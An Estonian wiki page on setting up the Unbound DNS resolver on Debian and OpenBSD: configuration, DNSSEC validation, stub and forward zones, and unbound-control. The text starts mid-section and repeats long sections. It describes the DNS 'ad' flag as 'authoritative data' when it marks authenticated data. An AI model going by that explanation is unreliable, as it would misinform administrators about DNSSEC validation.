local-data: "127.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "1.0.0.127.in-addr.arpa. 10800 IN PTR localhost."

Selleks, et asutuse lokaalses autoriteetses nimeserveris kirjeldatud privaatsete aadresside pöördteisendused töötaksid tuleb kirjeldada vastava tsooni jaoks local-zone väärtusega nodefault

server:
...
local-zone: "168.192.in-addr.arpa." nodefault

ning nt 192.168.1 võrgu puhul näidata pädeva nimeserveri aadress

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.251

===Jõudlus===

* Unbound oskab kasutada mitut protsessorit ja nö keskpärasel riistvaral suudab teenidada kümneid tuhandeid päringuid sekundis.
* Unbound on 2-3 korda kiirem kui Bind.

===Klientprogrammi unbound-host kasutamine===

Klientprogramm unbound-host võimaldab nt kontrollida, kas nimelahenduse valideerimine töötab

# unbound-host -C unbound.conf -t A -v www.kaminskybug.se
[1264938168] libunbound[2566:0] notice: init module 0: validator
[1264938168] libunbound[2566:0] notice: init module 1: iterator
www.kaminskybug.se is an alias for fou.iis.se. (secure)
fou.iis.se has address 212.247.204.242 (secure)

===Haldusprogramm unbound-control===

Haldusprogrammiga unbound-control saab juhtida Unbound resolveri tööd ja küsida statistikat. Kuna unbound-control võimaldab resolveri töötamist oluliselt mõjutada, nt laadida cache sisu tekstifailist või resolveri seisata, siis peab hoolega jälgima, et unbound-control kasutamisele oleks seatud vajalikud piirangud.

====Unbound resolveri ettevalmistamine====

unbound-control suhtleb Unbound serveriga vaikimisi üle 953/tcp pordi. Osaliste autentimiseks kasutatakse avaliku-võtme tehnikat, vajalike võtmete genereerimiseks sobib kasutada unbound-control-setup utiliiti

# unbound-control-setup
...
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
Setup success. Certificates created. Enable in unbound.conf file to use

Tulemusena tekivad /var/unbound/etc kataloogi neli võtit, kask serveri ja kaks kliendi jaoks

unbound_control.key
unbound_control.pem
unbound_server.key
unbound_server.pem

unbound-control kasutamiseks tuleb vastav funktsionaalsus Unbound serveris sisse lülitada nt sektsiooniga

remote-control:
control-enable: yes
control-interface: 127.0.0.1

====unbound-control kasutamine====

Vaikimisi kasutab unbound-control Unbound serveri seadistusfaili, nt sobib alustuseks kasutada unbound serverit ja unbound-control utiliiti samas arvutis.

* Unbound resolveri oleku küsimine

# unbound-control status
version: 1.3.0
verbosity: 1
threads: 1
modules: 2 [ validator iterator ]
uptime: 1184 seconds
unbound (pid 23298) is running...

* Resolveri cacheist tsooni loomaaed.tartu.ee andmete kustutamine

# unbound-control flush_zone loomaaed.tartu.ee
ok removed 3 rrsets, 2 messages and 0 key entries

* Cache sisu esitamine

# unbound-control dump_cache

====Resolveri kasutusstatistika====

Üks unbound-control kasutusjuht on koguda resolveri kasutusstatistikat

# unbound-control stats_noreset

Praktiliselt on seda sobiv automatiseerida Munin või Cacti tarkvaraga, mida on kirjeldatud aadressil http://www.unbound.net/documentation/howto_statistics.html.

===Unbound ja NSD protsessid samas arvutis===

Unbound seadistusfailis sobib kasutada ridu

domain-insecure: "loomaaed.tartu.ee"
domain-insecure: "loomaaed.tartu.eu"
domain-insecure: "loomaaed.tartu.org"
...
stub-zone:
name: "loomaaed.tartu.ee"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.eu"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.org"
stub-addr: 10.193.0.53

===IPv6 kasutamine===

IPv6 kasutamiseks tuleb seadistusfailis näidata, millisel IPv6 aadressil protsess kuulab

interface: 2001:1530:90:11:192::53

ning lubada asjakohastest võrkudest teenuse poole pöörduda, nt

access-control: fd99::/64 allow

Lisaks tuleb arvestada seda, et nimepäringute lahendamiseks kasutab Unbound ise IPv4 ja IPv6 võrku.

===2026 kevad märkused===

====Tööpõhimõte====

Väited

* private-address ja private-domain kasutamine toimub koostöös
* private-domain loetleb domeenide nimed, mille alla kuuluvad kirjed võivad lahenduda privaatseteks aadressideks
* private-address määratleb, mida peetakse antud kasutusjuhtumil silmas privaatsete aadresside all
* üks unbound protssess saab tegeleda ainult ühe komplekti domeenide ja ühe komplekti privaatsete aadressidega

====Misc====

Takerdub

<pre>
# apt-get install unbound
root@arv:~# apt-get install unbound
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound-anchor
The following NEW packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound unbound-anchor
0 upgraded, 5 newly installed, 0 to remove and 49 not upgraded.
...

Setting up unbound (1.6.7-1ubuntu2.6+esm4) ...
Created symlink /etc/systemd/system/multi-user.target.wants/unbound.service → /lib/systemd/system/unbound.service.
Created symlink /etc/systemd/system/unbound.service.wants/unbound-resolvconf.service → /lib/systemd/system/unbound-resolvconf.service.
Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.

Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.
invoke-rc.d: initscript unbound, action "start" failed.
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (auto-restart) (Result: exit-code) since Tue 2026-06-16 11:21:17 EEST; 9ms ago
Docs: man:unbound(8)
Process: 5650 ExecStart=/usr/sbin/unbound -d $DAEMON_OPTS (code=exited, status=1/FAILURE)
Process: 5304 ExecStartPre=/usr/lib/unbound/package-helper root_trust_anchor_update (code=exited, status=0/SUCCESS)
Process: 5301 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Main PID: 5650 (code=exited, status=1/FAILURE)
Processing triggers for libc-bin (2.27-3ubuntu1.6+esm6) ...
Processing triggers for systemd (237-3ubuntu10.57+esm3) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

root 5304 0.0 0.0 4636 896 ? Ss 11:20 0:00 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
unbound 5307 0.0 0.0 34596 7820 ? S 11:20 0:00 \_ /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v
</pre>

ning

<pre>
root@arv:~# systemctl status unbound
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (start-pre) since Tue 2026-06-16 11:33:15 EEST; 38s ago
Docs: man:unbound(8)
Process: 12287 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Cntrl PID: 12290 (package-helper)
Tasks: 2 (limit: 4915)
CGroup: /system.slice/unbound.service
├─12290 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
└─12293 /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v

Jun 16 11:33:15 arv.auul.pri.ee systemd[1]: Starting Unbound DNS server...
</pre>

lahenduse koht

<pre>
root@arv:~# head -n 10 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.

root@arv:~# head -n 20 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.
RESOLVCONF="true"
ROOT_TRUST_ANCHOR_UPDATE="true"

if [ -f /etc/default/unbound ]; then
. /etc/default/unbound

case "x$RESOLVCONF" in xfalse|x0|xno)
RESOLVCONF="false"
;;
esac
</pre>

t

<pre>
server:
interface: 127.0.0.1
port: 53
do-ip4: yes
do-ip6: no

access-control: 127.0.0.1/32 allow
module-config: "iterator"
verbosity: 1
use-syslog: yes
log-queries: yes

stub-zone:
name: "xxx.ee"
stub-addr: 192.168.1.111

forward-zone:
name: "."
forward-addr: 10.0.9.4
forward-addr: 10.0.9.5
</pre>

===Kasulikud lisamaterjalid===

* http://unbound.net/
* http://unbound.nlnetlabs.nl/pipermail/unbound-users/
* http://www.howtoforge.com/installing-using-unbound-nameserver-on-debian-etch
* http://www.nlnetlabs.nl/publications/dnssec_howto/index.html
* http://secspider.cs.ucla.edu/islands.html
* https://itar.iana.org/
* https://ns.iana.org/dnssec/status.html
* https://dlv.isc.org/
* http://en.wikipedia.org/wiki/AS112
* [[:Pädeva nimeserveri NSD kasutamine]]

Rekursiivse resolveri Unbound kasutamine operatsioonisüsteemiga Debian

2026-06-17T15:31:59Z

Imre: /* 2026 kevad märkused */

[[Kategooria:Interneti domeeninimede süsteem]]
===Sissejuhatus===

Üks võimalus liigitada nimeservereid või nimeserverite tarkvara on selle järgi, millised päringuid teenindatakse

* pädev ehk autoriteetne (ingl. k. authoritative) - vastab päringutele ainult nimeserveri tsoonifailis kirjeldatud andmete alusel; autoriteetsed nimeserverid teenindavad reeglina resolverite päringuid
* rekursiivne (ingl. k. recursive) - rekursiivne nimeserver ei sisalda nö oma tsoonifaili, st ta ei ole mingite vastuste osas autoriteetne; rekursiivne nimeserver teenindab mingi piiratud hulga klientide päringuid lahendades neid autoriteetsete nimeserverite abil ja seetõttu nimetatakse rekursiivset nimeserverit tihti resolveriks (ingl. k. to resolve - lahendama)

Unbound http://www.unbound.net/ resolveril on selliseid omadused

* rekursiivne - lahendab nö lõppkasutaja esitatud päringuid, nt sobib seadistada töökohaarvuti nimeserveriks
* vaheladustav (ingl. k. caching) - Unbound peab kord lahendatud vastust mõnda aega meeles, mis tähendab, et järgmisele samale päringule vastab ta kliendile kohe ja ei pea omakorda pöörduma vastuse saamiseks autoriteetsete nimeserverite poole
* valideeriv - toetab DNSSEC kasutamist
* IPv6 tugi

Rekursiivse resolveri vastutus on parimal võimalikul moel anda kliendi esitatud päringule vastus, seejuures

* kasutada vastuse koostamisel mitmete pädevate nimeserverite abi
* anda õige vastus - nt mitte ennast lasta eksitada cache poisoning tehnikatest, võimalusel kasutada DNSSEC vahendeid
* vastata kiiresti

===Unbound paigaldamine===

2011 aastal leidub paljude operatsioonisüsteemide paketihalduses Unbound tarkvara.

====Debian====

Debian Squeeze sisaldab versiooni 1.4.6 ja paigaldamiseks sobib öelda

# apt-get install unbound

====OpenBSD====

OpenBSD 5.4 sisaldab binaarse paketina versiooni 1.4.9 ja paigaldamiseks sobib öelda

# pkg_add unbound
unbound-1.4.20:libldns-1.6.16p0: ok
useradd: Warning: home directory `/var/unbound' doesn't exist, and -m was not specified
unbound-1.4.20: ok
The following new rcscripts were installed: /etc/rc.d/unbound
See rc.d(8) for details.
--- +unbound-1.4.20 -------------------
You should add:

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

to /etc/rc.conf.local to create a syslog socket in the unbound chroot.

Selleks, et /etc/rc.d/unbound skript töötaks, peab olema seadistatud unbound-control (127.0.0.1 pealt).

===Unbound seadistamine===

Resolveri seadistusfailis tuleb näidata muu hulgas

* juurnimeserverite aadressid
* millisel aadressil resolver päringuid teenindab
* millised kliendid saavad resolverit kasutada, tavaliselt kliendi src ip aadressi täpsusega

Unbound tööd juhib seadistusfail unbound.conf

* /etc/unbound/unbound.conf - Debian
* /var/unbound/etc/unbound.conf - OpenBSD

Lihtsamal juhul võib kasutada nt sellise sisuga seadistusfaili

server:
interface: 192.168.10.190
outgoing-interface: 192.168.10.190
access-control: 192.168.1.0/24 allow
access-control: 192.168.10.0/24 allow_snoop
root-hints: "/var/unbound/etc/named.cache"

kus

* interface - millisel aadressil arvuti Unbound resolveri kliente teenindab
* outgoing-interface - milliselt aadressilt resolveri päringud autoriteetsetele nimeserveritele väljuvad
* access-control - millistelt ip aadressidelt saab Unbound resolverit kasutada; allow lubab esitada ainult rekursiivseid päringuid, nt +norec annab vaikimisi refused vastuse

$ dig +norec @nimeserver domeeni.nimi
...
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 52133

allow_snoop lubab mõlemaid (viimane on vajalik, et unbound kasutaja saaks öelda

$ dig +trace @nimeserver domeeni.nimi

* root-hints - resolver peab alati teadma interneti juurnimeserverite aadresse

Juurnimeserverite aadresse saab küsida mõnes juba seadistatud resolveriga arvutis

$ dig . ns

või kopeerida aadressilt Linuxis

$ wget ftp://FTP.INTERNIC.NET/domain/named.cache

OpenBSD keskkonnas

$ ftp ftp://FTP.INTERNIC.NET/domain/named.cache

===Unbound käivitamine===

Unbound resolver teenindab päringuid portidel 53/udp ja 53/tcp.

====Debian====

Käivitamiseks tuleb öelda

# /etc/init.d/unbound start | stop

====OpenBSD====

Selleks, et Unbound töötaks OpenBSD all chroot keskkonnas kataloogis /var/unbound kasutajana _unbound tuleb kasutada seadistusfailis rida

chroot: "/var/unbound"

Et chroot keskkonnas töötav Unbound saaks logida syslog'i tuleb syslog käivitamisel lisaks kasutada '-a /var/unbound/dev/log'

# syslogd -a /var/www/dev/log -a /var/empty/dev/log -a /var/unbound/dev/log

/etc/rc.conf.local failis sobib kasutada rida

syslogd_flags="${syslogd_flags} -a /var/unbound/dev/log"

2012 kevadel ütleb OpenBSD v. 5.1 paketihalduse unbound chroot kasutamisel kävitamisel nii

# unbound -dv
[1335943357] unbound[20534:0] notice: Start of unbound 1.4.15.
[1335943357] unbound[20534:0] warning: increased limit(open files) from 128 to 4140
[1335943357] unbound[20534:0] warning: unable to setusercontext _unbound: Bad file descriptor

Limiitide tuleb töötada sarnaselt nagu on kirjeldatud aadressil http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_OpenBSD_kasutamine#Login_class_kasutamine.

Tavalisel viisil sobib kasutada käivitusskripti

# /etc/rc.d/unbound start | stop

Vastasel korral on logis midagi sellist

Mar 13 16:03:01 unbound[28759:0] error: can't create socket: Too many open files

===Unbound kasutamine===

Unbound resolveri kasutajateks on tavaliselt arvutid, mis vajavad nimelahendust, nt kohtvõrgu arvutid, eposti serverid jt kusjuures Unbound protsess töötab selleks ettenähtud arvutis või võrgusõlmeks olevas seadmes

internet
...
|
_|_
| | OpenBSD võrgusõlm
|___| Unbound protsess
|
--|---|----------|-----------|--
| | |

dns kliendid (töökohaarvuti, serverid)

Linux keskkonnas sobib näidata nimeserveri aadress staatiliselt arvuti /etc/resolv.conf failis nt reaga

nameserver 192.168.10.190

Unbound resolveri tööd saab kontrollida nt öeldes mõnes arvutis, kus peab kõnealust resolverit saama kasutada

$ dig @192.168.10.190 kuutorvaja.eenet.ee a

ja vastus peaks sisaldama sarnaseid ridu rida

...
;; QUESTION SECTION:
;kuutorvaja.eenet.ee. IN A

;; ANSWER SECTION:
kuutorvaja.eenet.ee. 83840 IN A 193.40.0.7
..

===Nimepäringu vastuse valideerimine===

Nimepäringute vastuste valideerimiseks kasutatakse üldiselt DNSSEC tehnikat. 2011 aastal on selleks mitmeid võimalusi, kaks populaarsemat on

* signeeritud tsoonifailidega juurnimeserverite kasutamine, kõige loomulikum viis
* DLV (DNSSEC Look-aside Validation) - üleminekuaja häkk

Kui nimeteenust kasutatakse sarnaselt ülaltoodud skeemile, siis peab arvestama, et DNSSEC kontroll toimub Unbound protsessi juures, sealt edasi kliendini liigub vastus tavalise avateksina üle kohtvõrgu ja klient otsustab vastuse turvalisuse üle ad biti järgi vastuses. Seetõttu on reeglina soovitav, et Unbound töötaks nimeteenust kasutatavatele arvutitele võimalikult lähedal.

DNSSEC juurutamise kronoloogia

* 15. juuli 2010 - juurnimeserverid kasutavad signeeritud tsoone http://www.root-dnssec.org/
* ? - .org tsoon on signeeritud
* 31. märts 2011 - .com tsoon on signeeritud http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/

Kasulikud lisamaterjalid

* http://www.theregister.co.uk/2011/04/01/dnssec_com_goes_live/
* http://blogs.pcmag.com/securitywatch/2011/03/dnssec_in_com_domain_is_a_good.php

====Signeeritud tsoonifailiga juurnimeserverite kasutamine====

Unbound seadistamiseks tuleb kasutada seadistusfailis rida

auto-trust-anchor-file: "root.key"

kusjuures fail peab olema unbound protsessile kirjutatav ning esialgselt sisaldama rida (as per http://unbound.net/documentation/howto_anchor.html)

# cat /var/unbound/etc/root.key
. IN DS 19036 8 2 49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5

# chown _unbound /var/unbound/etc
# chown _unbound:_unbound /var/unbound/etc/root.key

Peale unbound protsessi käivitamist selle faili sisu muutub automaatselt.

Kontrollimiseks sobib öelda

$ dig . ns +dnssec +multiline

; <<>> DiG 9.7.2-P3 <<>> . ns +dnssec +multiline
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4737
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 14, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS

;; ANSWER SECTION:
. 518267 IN NS m.root-servers.net.
. 518267 IN NS g.root-servers.net.
. 518267 IN NS b.root-servers.net.
. 518267 IN NS h.root-servers.net.
. 518267 IN NS a.root-servers.net.
. 518267 IN NS e.root-servers.net.
. 518267 IN NS k.root-servers.net.
. 518267 IN NS f.root-servers.net.
. 518267 IN NS c.root-servers.net.
. 518267 IN NS j.root-servers.net.
. 518267 IN NS i.root-servers.net.
. 518267 IN NS l.root-servers.net.
. 518267 IN NS d.root-servers.net.
. 518267 IN RRSIG NS 8 0 518400 20110409000000 (
20110401230000 34525 .
De4SFgTDwpgbz1JjTlaPzu7ZNRURLSnoYmQQQIZq7Gny
RghOrsvS1soH5F43Gxr5BIi+422EBLJIrEHFnbvLy22S
LqKtSw67eDdsBZyjE5fTtDHyYhnoR8YQWswgGVMRk4Ek
iDDMIOk5pF+CvbML6TlvTWrnPCwNWXnbLFnT9SY= )

;; Query time: 0 msec
;; SERVER: 10.192.0.53#53(10.192.0.53)
;; WHEN: Sat Apr 2 18:44:16 2011
;; MSG SIZE rcvd: 397

kus tuleb tähele panna

* vastus sisaldab RRSIG kirjet
* flags: qr rd ra ad - ad tähistab, et tegu on authoritative data sisaldusega

====DLV====

DLV seadistamiseks tuleb

* kopeerida trust anchor fail kataloogi /var/unbound/etc

# cd /var/unbound/etc
# ftp http://ftp.isc.org/www/dlv/dlv.isc.org.key

* Unbound seadistusfailis kasutada rida

dlv-anchor-file: "dlv.isc.org.key

Valideeritud nimepäringu vastus näeb välja nt selline

$ dig www.kaminskybug.se a +dnssec +multiline

; <<>> DiG 9.5.1-P3 <<>> www.kaminskybug.se a +dnssec +multiline
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56069
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.kaminskybug.se. IN A

;; ANSWER SECTION:
www.kaminskybug.se. 3590 IN CNAME fou.iis.se.
www.kaminskybug.se. 3590 IN RRSIG CNAME 5 3 3600 20100205210001 (
20100126210001 13358 kaminskybug.se.
goEav1vWK49WEvGY/G1EBKOgekQk11JvjsQxE7chH6Kg
OwZNpOXwomE1z9zvLcwkD60CQAZWC9psA1z01iIwtOrt
Yq6L+2A0PLVAAuRYeY3CQnbHoHRYClCUz0dIkxhtz9f/
Um1AuC3FtqV6t9q8lLb4ooav0Ex64KuwoPPxqqs= )
fou.iis.se. 3590 IN A 212.247.204.242
fou.iis.se. 3590 IN RRSIG A 5 3 3600 20100209131501 (
20100130131501 56315 iis.se.
BOPpSETDBKu6CjOcz2ULnOnfRVoXfOXj9OjW4zwjPuWl
7vJ8630yXsuSEe89RuH/ZsuOGbeJnumQ/XmD6ftWL9yM
MPUF1ZYxCtExaBcIxhxDIFJv4E4RZAOkbb9ZdYKTglIL
zDleOOms0iVgCAnnWJSnmDpzhfvr8xoTGlh7myE= )

;; AUTHORITY SECTION:
iis.se. 3590 IN NS ns.nic.se.
iis.se. 3590 IN NS ns3.nic.se.
iis.se. 3590 IN NS ns2.nic.se.
iis.se. 3590 IN RRSIG NS 5 2 3600 20100209131501 (
20100130131501 56315 iis.se.
B3SheLIv8ouVPpFGjvM8q5fl9ZMnnPWR8x9QDD0uSxoH
iV2fYHjiKC5a2+8Znsi4zSdO2AmH+reUCP74qvYpkl1K
+NbEzndzzrJQ0XlT1icy3MC6vdvgdE7Opqjab/7iIiYV
X9UjZpHKR284EljSrKJ0z53/T+12P3K0VU/dRFE= )

;; Query time: 1 msec
;; SERVER: 10.53.67.69#53(10.53.67.69)
;; WHEN: Sun Jan 31 00:25:39 2010
;; MSG SIZE rcvd: 648

kus ad lipp annab tunnistust, et vastus on valideeritud

flags: qr rd ra ad; QUERY: 1, ANSWER: 4, AUTHORITY: 4, ADDITIONAL: 1

====Firefox DNSSEC lisa kasutamine====

Firefox DNSSEC lisa https://addons.mozilla.org/en-us/firefox/addon/dnssec-validator/ abil saab brauseri kasutamise ajal tagasisidet kuidas käesolev nimi on lahendatud, nt

[[Pilt:Unbound-1.gif]]

Seejuures tuleb arvestada, et DNSSEC iseenest tähendab, et nimi lahendes turvaliselt, järgneva andmevahetuse turvalisus on eraldi küsimus ja nt https:// on üks viis selle saavutamiseks.

===domain-insecure tsoonid===

Kui kasutatakse signeeritud tsoonifailiga juurnimeservereid ning mõnele lokaalsele mitte-dnssec nimeserverile viitavaid stub-zone sissekandeid, siis võib olla asjakohane kasutada lisaks ridu

domain-insecure: "auul"
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

===Lokaalsed nimekirjeldused===

Lisaks sellele, et Unboundi kasutab nimede lahendamisel võrgus töötavaid autoriteetseid nimeservereid, saab kirjeldada seadistusfailis päri- ja pöördteisendusi

local-zone: "loomaaed.tartu.ee" static
local-data: "loomaaed.tartu.ee A 192.168.10.100"
..
local-data-ptr: "192.168.10.100 loomaaed.tartu.ee"

kus

* local-zone - lokaalselt unboundis kirjeldatud tsooni nimi
* static - sellel positsioonil st type parameeter määrab põhiliselt, kuidas mitte kirjeldatud nime küsimisele vastatakse
* local-data - päriteisendus
* local-data-prt - pöördteisendus

type väärtused

* static - local-data abil mitte kirjeldatud nime küsimisele vastatakse NXDOMAIN
* nodefault - AS112 tsoonide puhul vastab Unbound vaikimisi NXDOMAIN vastusega, nodefault puhul püütakse vastavaid nimesid lahendada
* transparent - local-data abil mitte kirjeldatud nimi püütakse lahenada internetist, stub-zone abil vms viisil
* redirect - kõik alamdomeenid vastatakse local-data abil näidatud väärtusega

===Stub tsoon===

Stub tsooni abil saab öelda, millist pädevat nimeserverit kasutada mõne domeeni nimelahenduseks. Praktiliselt võiks seda vaja minna kui asutuses on nt kasutusel mitte-avalik pädev nimeserver ja domeeni 'auul.' nimede lahendamiseks tuleks kasutada seda; vastasel korral püüaks Unbound neid nimesid lahendada pöördudes interneti juurnimeserverite poole.

Seadistusfailis kirjeldatakse stub tsoon selliselt

stub-zone:
name: "auul"
stub-addr: 192.168.1.251

kus

* name - domeeni nimi
* stub-addr - domeeni pädeva nimeserveri ip aadress
* stub sõna viitab asjaolule, et Unbound saab näidatud nimeserverilt otse vastuse kätte

Kui stub-zone abil on vaja teha mõne privaatsete aadressidega /24 subneti jaoks pöördteisendusi, siis tuleb tõenäoliselt kasutada koostöös selliseid direktiive

..
domain-insecure: "10.168.192.in-addr.arpa"
domain-insecure: "1.168.192.in-addr.arpa"
...

local-zone: "1.168.192.in-addr.arpa." transparent
local-zone: "2.168.192.in-addr.arpa." transparent
....

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

stub-zone:
name: "10.168.192.in-addr.arpa."
stub-addr: 192.168.1.247

Oluline on panna tähele, et korrektsel juhul lahendatakse kirjeldatud tsoonid stub-addr nimeserveri poolt, muud privaatsed aadressid saavad vastuseks (vastuse genereerib Unbound ise)

$ dig -x 192.168.5.5
..
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1480
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800

Kui vastus on, siis midagi on valesti, sest Unbound on seda käinud internetis lahendamas

..
;; QUESTION SECTION:
;5.5.168.192.in-addr.arpa. IN PTR

;; AUTHORITY SECTION:
168.192.in-addr.arpa. 86400 IN SOA prisoner.iana.org. hostmaster.trex.fi. 1 604800 86400 2419200 86400

===Forward tsoon===

Forward tsooni abil saab öelda, millist rekursiivset nimeserverit kasutada mõne domeeni nimelahenduseks. Seadistusfailis kirjeldatakse forward tsoon selliselt

forward-zone:
name: "loomla.tartu.ee"
forward-addr: 10.172.20.10

kus

* name - domeeninimi
* forward-addr - rekursiivse nimeserveri aadress

Selleks, et suunata kõik päringud lahendamiseks edasi sobib kasutada

forward-zone:
name: "."
forward-addr: 10.172.20.10

===AS112 tsoonid===

AS112 tsoonide hulka kuuluvad sellised pöördteisenduse tsoonid, vaikimisi vastab AS112 tsooni tehtud päringutele Unbound NXDOMAIN (põhjusel, et sisemiste arvutite poolt tehtud pöördteisenduspäringud ei jõuaks avalikku võrku)

* 10.in-addr.arpa
* 16.172.in-addr.arpa
* ...
* 31.172.in-addr.arpa
* 168.192.in-addr.arpa
* 254.169.in-addr.arpa
* 2.0.192.in-addr.arpa
* 100.51.198.in-addr.arpa
* 113.0.203.in-addr.arpa

Lisaks lahendab Unbound vaikimisi mõlemas suunas localhost - 127.0.0.1 teisendust justkui oleks kirjeldatud (sarnaselt on kirjeldatud ka IPv6 ::1)

local-zone: "localhost." static
local-data: "localhost. 10800 IN NS localhost."
local-data: "localhost. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "localhost. 10800 IN A 127.0.0.1"
local-data: "localhost. 10800 IN AAAA ::1
..

local-zone: "127.in-addr.arpa." static
local-data: "127.in-addr.arpa. 10800 IN NS localhost."
local-data: "127.in-addr.arpa. 10800 IN SOA localhost. nobody.invalid. 1 3600 1200 604800 10800"
local-data: "1.0.0.127.in-addr.arpa. 10800 IN PTR localhost."

Selleks, et asutuse lokaalses autoriteetses nimeserveris kirjeldatud privaatsete aadresside pöördteisendused töötaksid tuleb kirjeldada vastava tsooni jaoks local-zone väärtusega nodefault

server:
...
local-zone: "168.192.in-addr.arpa." nodefault

ning nt 192.168.1 võrgu puhul näidata pädeva nimeserveri aadress

stub-zone:
name: "1.168.192.in-addr.arpa."
stub-addr: 192.168.1.251

===Jõudlus===

* Unbound oskab kasutada mitut protsessorit ja nö keskpärasel riistvaral suudab teenidada kümneid tuhandeid päringuid sekundis.
* Unbound on 2-3 korda kiirem kui Bind.

===Klientprogrammi unbound-host kasutamine===

Klientprogramm unbound-host võimaldab nt kontrollida, kas nimelahenduse valideerimine töötab

# unbound-host -C unbound.conf -t A -v www.kaminskybug.se
[1264938168] libunbound[2566:0] notice: init module 0: validator
[1264938168] libunbound[2566:0] notice: init module 1: iterator
www.kaminskybug.se is an alias for fou.iis.se. (secure)
fou.iis.se has address 212.247.204.242 (secure)

===Haldusprogramm unbound-control===

Haldusprogrammiga unbound-control saab juhtida Unbound resolveri tööd ja küsida statistikat. Kuna unbound-control võimaldab resolveri töötamist oluliselt mõjutada, nt laadida cache sisu tekstifailist või resolveri seisata, siis peab hoolega jälgima, et unbound-control kasutamisele oleks seatud vajalikud piirangud.

====Unbound resolveri ettevalmistamine====

unbound-control suhtleb Unbound serveriga vaikimisi üle 953/tcp pordi. Osaliste autentimiseks kasutatakse avaliku-võtme tehnikat, vajalike võtmete genereerimiseks sobib kasutada unbound-control-setup utiliiti

# unbound-control-setup
...
Signature ok
subject=/CN=unbound-control
Getting CA Private Key
Setup success. Certificates created. Enable in unbound.conf file to use

Tulemusena tekivad /var/unbound/etc kataloogi neli võtit, kask serveri ja kaks kliendi jaoks

unbound_control.key
unbound_control.pem
unbound_server.key
unbound_server.pem

unbound-control kasutamiseks tuleb vastav funktsionaalsus Unbound serveris sisse lülitada nt sektsiooniga

remote-control:
control-enable: yes
control-interface: 127.0.0.1

====unbound-control kasutamine====

Vaikimisi kasutab unbound-control Unbound serveri seadistusfaili, nt sobib alustuseks kasutada unbound serverit ja unbound-control utiliiti samas arvutis.

* Unbound resolveri oleku küsimine

# unbound-control status
version: 1.3.0
verbosity: 1
threads: 1
modules: 2 [ validator iterator ]
uptime: 1184 seconds
unbound (pid 23298) is running...

* Resolveri cacheist tsooni loomaaed.tartu.ee andmete kustutamine

# unbound-control flush_zone loomaaed.tartu.ee
ok removed 3 rrsets, 2 messages and 0 key entries

* Cache sisu esitamine

# unbound-control dump_cache

====Resolveri kasutusstatistika====

Üks unbound-control kasutusjuht on koguda resolveri kasutusstatistikat

# unbound-control stats_noreset

Praktiliselt on seda sobiv automatiseerida Munin või Cacti tarkvaraga, mida on kirjeldatud aadressil http://www.unbound.net/documentation/howto_statistics.html.

===Unbound ja NSD protsessid samas arvutis===

Unbound seadistusfailis sobib kasutada ridu

domain-insecure: "loomaaed.tartu.ee"
domain-insecure: "loomaaed.tartu.eu"
domain-insecure: "loomaaed.tartu.org"
...
stub-zone:
name: "loomaaed.tartu.ee"
stub-addr: 10.193.0.53

stub-zone:
name: "loomaaed.tartu.eu"
stub-addr: 10.193.0.53

stub-zone:
